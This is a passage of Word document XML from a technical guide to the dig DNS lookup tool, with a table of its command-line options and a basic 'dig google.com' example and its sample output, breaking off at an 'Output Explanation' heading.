          <w:p w14:paraId="34A7EF8F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4621422C" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32623E73"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erver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E02A282" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Query specific DNS server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5E2C266B" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04F4700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t TYPE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="307A4815" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Query specific record type (A, AAAA, MX, NS, SOA, TXT, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="259B5E1B" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5ECABA13"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c CLASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="225157A0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Query class (IN, CH, HS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2469E0CE" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54760880"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p PORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F30F668" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Connect to non-standard port</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6F3FAB9C" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CE1FD54"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54C045B9" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use IPv4 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4D975442" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78A784F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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DA4FD54" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use IPv6 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="21ACC497" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4188528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x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25D2C3C3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Reverse lookup mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="76F8A7C7" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BFEA9E5"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f FILE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73C8BC9C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Read queries from file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7ABB97F2" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C4967EB"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b ADDRESS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67246821" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set source IP address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4478D9C3" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09C11694"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lastRenderedPageBreak/>
              <w:t>-y KEY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F8BE263" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>TSIG key for authenticated queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="457AD7F6" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B46F9F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hort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CF03054" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Short form answer only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6E789EAA" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14BBE338"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oall +answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07088F93" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show only answer section</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0552AFB5" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="246BDCAA"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trace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58FD37CE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Trace delegation path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="11F44B3C" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="502B6C60"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tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CE96C81" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use TCP instead of UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1C785BF5" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63F70361"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otcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16497E20" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use UDP (default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="74DC72F3" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="506C80AC"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etry=N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D9128F0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set number of retries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5C3B20A7" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4832C68B"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time=N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EF79C7C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set query timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1B6339A6" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63609E2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ecurse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CA119B0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set recursion desired flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="149DE44F" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48A75E6F"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orecurse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57DEACF4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Clear recursion desired flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="750EBE1F" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="084C721C"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tats</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77C2539E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show query statistics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3958FF8A" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51A0907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ostats</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17D3F48A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Don't show statistics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="65BAD739" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26502DD2"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question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CFA9F36" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show question section</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="50D4F1DC" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BDF823E"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oquestion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58946AE0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Don't show question section</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2879423F" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="144F60A3"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nswer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="443B0D47" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show answer section</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="71F46C31" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EEF427A"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oanswer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BD6291F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Don't show answer section</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1BCD15C0" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48E77D2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uthority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73B903A0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show authority section</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6E1781FC" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25C82DB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oauthority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B8E531F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Don't show authority section</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6026C85F" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16E28374"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dditional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AD9C9FE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show additional section</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="69879656" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AE1E011"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oadditional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="565DDA2B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Don't show additional section</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="119F3E9B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25318039" w14:textId="5805E7FC" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Basic domain lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7710E23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dig google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC3848A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C0884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lt;&lt;&gt;&gt; DiG 9.16.1-Ubuntu &lt;&lt;&gt;&gt; google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65383BE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global options: +cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395F8E7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Got answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E890B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gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7204AC7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flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385A732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OPT PSEUDOSECTION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01018D0C"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EDNS: version: 0, flags:; udp: 65494</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338CB6F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QUESTION SECTION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3853DEA6"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oogle.com.                    IN      A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04915F2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ANSWER SECTION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FB6ED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oogle.com.             300     IN      A       142.251.46.142</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D7557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Query time: 12 msec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F694A4"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SERVER: 127.0.0.53#53(127.0.0.53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB12C5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WHEN: Fri Dec 06 14:30:15 UTC 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FE3056"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MSG SIZE  rcvd: 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09913853" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
